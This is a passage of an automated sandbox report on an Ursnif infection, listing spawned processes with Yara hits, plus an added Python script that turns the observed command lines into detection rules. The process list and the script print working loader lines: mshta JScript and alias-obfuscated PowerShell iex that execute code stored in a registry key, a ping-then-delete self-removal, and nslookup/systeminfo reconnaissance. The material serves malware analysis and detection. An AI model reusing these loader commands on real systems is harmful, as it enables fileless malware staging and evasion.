                                                        Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dyznokx3\dyznokx3.cmdline
                                                        Imagebase:0x7ff7cb6d0000
                                                        File size:2739304 bytes
                                                        MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Reputation:moderate

                                                        Target ID:26
                                                        Start time:16:19:47
                                                        Start date:04/05/2022
                                                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5431.tmp" "c:\Users\user\AppData\Local\Temp\dyznokx3\CSCF033825E263E4DFC98584E77F08A80E9.TMP"
                                                        Imagebase:0x7ff7bf6d0000
                                                        File size:47280 bytes
                                                        MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate

                                                        Target ID:27
                                                        Start time:16:19:56
                                                        Start date:04/05/2022
                                                        Path:C:\Windows\explorer.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\Explorer.EXE
                                                        Imagebase:0x7ff6f3b00000
                                                        File size:3933184 bytes
                                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        Target ID:33
                                                        Start time:16:20:11
                                                        Start date:04/05/2022
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\2oCOO5LbPu.dll
                                                        Imagebase:0x7ff7bb450000
                                                        File size:273920 bytes
                                                        MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        Target ID:34
                                                        Start time:16:20:13
                                                        Start date:04/05/2022
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff647620000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        Target ID:35
                                                        Start time:16:20:15
                                                        Start date:04/05/2022
                                                        Path:C:\Windows\System32\PING.EXE
                                                        Wow64 process (32bit):false
                                                        Commandline:ping localhost -n 5
                                                        Imagebase:0x7ff689210000
                                                        File size:21504 bytes
                                                        MD5 hash:6A7389ECE70FB97BFE9A570DB4ACCC3B
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
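
The process list records the staging chain: mshta.exe evaluates JScript read from a GUID-named key under HKCU\Software\AppDataLow, powershell.exe does the same for that key's UrlsReturn value through aliased `gp`/`iex`, csc.exe and cvtres.exe compile a temporary C# source, and cmd.exe sleeps with `ping localhost -n 5` before deleting the dropped DLL. As an added example, not part of the report, the following Python runs process-creation rules over those command lines (copied from the entries above into constructed events; the `image` field is each entry's Path line) and extracts the staging key as an indicator.

```python
import re

GUID = r"[0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}"
# Key the stages are read from; backslashes are doubled or tripled inside the
# JScript literal, so one-or-more is matched.
STAGING_KEY = re.compile(r"AppDataLow\\+Software\\+Microsoft\\+(" + GUID + ")")

# Constructed events: command lines copied from the report's process list.
EVENTS = [
    {"id": 19, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"""C:\Windows\System32\mshta.exe" "about:<hta:application><script>Cq7h='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Cq7h).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>"""},
    {"id": 20, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jasvusrvks -value gp; new-alias -name ssmthn -value iex; ssmthn ([System.Text.Encoding]::ASCII.GetString((jasvusrvks "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))'''},
    {"id": 22, "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     "cmdline": r'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ykprd3xj\ykprd3xj.cmdline'},
    {"id": 33, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\2oCOO5LbPu.dll'},
    {"id": 37, "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r'"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h'},
    {"id": 34, "image": r"C:\Windows\System32\conhost.exe",
     "cmdline": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},
]

# (rule name, image basename, predicate over the lower-cased command line)
RULES = [
    ("mshta-inline-hta-registry-stage", "mshta.exe",
     lambda c: "<hta:application>" in c and ".regread(" in c),
    ("powershell-alias-iex-registry-stage", "powershell.exe",
     lambda c: "new-alias" in c and "-value iex" in c and "appdatalow" in c),
    ("csc-compile-from-temp", "csc.exe",
     lambda c: "/noconfig" in c and "\\temp\\" in c and c.rstrip('"').endswith(".cmdline")),
    ("ping-sleep-self-delete", "cmd.exe",
     lambda c: re.search(r"ping\s+(localhost|127\.0\.0\.1)\s+-n\s+\d+.*&&\s*del\s", c) is not None),
    ("control-rundll-without-cpl", "rundll32.exe",
     lambda c: "control_rundll" in c and ".cpl" not in c),
]


def staging_key(cmdline):
    """The GUID-named key under HKCU\\Software\\AppDataLow a stage reads, or None."""
    m = STAGING_KEY.search(cmdline)
    return m.group(1).upper() if m else None


def evaluate(event):
    """Rule names that fire for one process-creation event."""
    image = event["image"].rsplit("\\", 1)[-1].lower()
    cmd = event["cmdline"].lower()
    return [name for name, img, pred in RULES if img == image and pred(cmd)]


def scan(events):
    """Map of target id -> fired rules (only ids with hits) plus every staging key seen."""
    hits = {e["id"]: evaluate(e) for e in events}
    keys = {staging_key(e["cmdline"]) for e in events} - {None}
    return {k: v for k, v in hits.items() if v}, keys
```

Keep the mshta and PowerShell rules tied to the registry-read pattern rather than to `mshta` or `iex` alone; the csc.exe rule fires on any PowerShell `Add-Type` compilation and is corroborating evidence rather than an alert on its own, which is why `scan` reports the rules per process and lets the analyst weigh the chain.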

                                                        Target ID:36
                                                        Start time:16:20:20
                                                        Start date:04/05/2022
                                                        Path:C:\Windows\System32\RuntimeBroker.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                        Imagebase:0x7ff6b45b0000
                                                        File size:99272 bytes
                                                        MD5 hash:C7E36B4A5D9E6AC600DD7A0E0D52DAC5
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000024.00000000.486983679.000001F9BBE30000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000024.00000000.477935242.000001F9BBE30000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000024.00000000.471067441.000001F9BBE30000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000024.00000002.783581138.000001F9BC102000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security

                                                        Target ID:37
                                                        Start time:16:20:20
                                                        Start date:04/05/2022
                                                        Path:C:\Windows\System32\rundll32.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
                                                        Imagebase:0x7ff67f250000
                                                        File size:69632 bytes
                                                        MD5 hash:73C519F050C20580F8A62C849D49215A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000025.00000003.466969074.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000025.00000000.462400330.0000015723930000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000025.00000000.459537251.0000015723930000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000025.00000003.466321410.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000025.00000002.472945195.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000025.00000000.457650173.0000015723930000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security

                                                        Target ID:38
                                                        Start time:16:20:23
                                                        Start date:04/05/2022
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\1E0C.bi1"
                                                        Imagebase:0x7ff7bb450000
                                                        File size:273920 bytes
                                                        MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        Target ID:40
                                                        Start time:16:20:26
                                                        Start date:04/05/2022
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff647620000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        Target ID:42
                                                        Start time:16:20:27
                                                        Start date:04/05/2022
                                                        Path:C:\Windows\System32\nslookup.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:nslookup myip.opendns.com resolver1.opendns.com
                                                        Imagebase:0x7ff713510000
                                                        File size:86528 bytes
                                                        MD5 hash:AF1787F1DBE0053D74FC687E7233F8CE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        Target ID:44
                                                        Start time:16:20:35
                                                        Start date:04/05/2022
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\1E0C.bi1"
                                                        Imagebase:0x7ff7bb450000
                                                        File size:273920 bytes
                                                        MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        Target ID:45
                                                        Start time:16:20:37
                                                        Start date:04/05/2022
                                                        Path:C:\Windows\System32\RuntimeBroker.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                        Imagebase:0x7ff6b45b0000
                                                        File size:99272 bytes
                                                        MD5 hash:C7E36B4A5D9E6AC600DD7A0E0D52DAC5
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002D.00000002.783998250.000001FFC4C02000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000002D.00000000.534482367.000001FFC4820000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000002D.00000000.515611246.000001FFC4820000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000002D.00000000.528687963.000001FFC4820000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security

                                                        Target ID:46
                                                        Start time:16:20:42
                                                        Start date:04/05/2022
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff647620000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        Target ID:48
                                                        Start time:16:20:59
                                                        Start date:04/05/2022
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /C "systeminfo.exe > C:\Users\user\AppData\Local\Temp\2E09.bin1"
                                                        Imagebase:0x7ff7bb450000
                                                        File size:273920 bytes
                                                        MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        Target ID:49
                                                        Start time:16:20:59
                                                        Start date:04/05/2022
                                                        Path:C:\Windows\System32\RuntimeBroker.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                        Imagebase:0x7ff6b45b0000
                                                        File size:99272 bytes
                                                        MD5 hash:C7E36B4A5D9E6AC600DD7A0E0D52DAC5
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000031.00000000.558152492.0000018282CA0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000031.00000000.564931591.0000018282CA0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000031.00000000.554617664.0000018282CA0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000031.00000002.779796004.0000018282502000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security

                                                        Target ID:51
                                                        Start time:16:21:05
                                                        Start date:04/05/2022
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff647620000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        No disassembly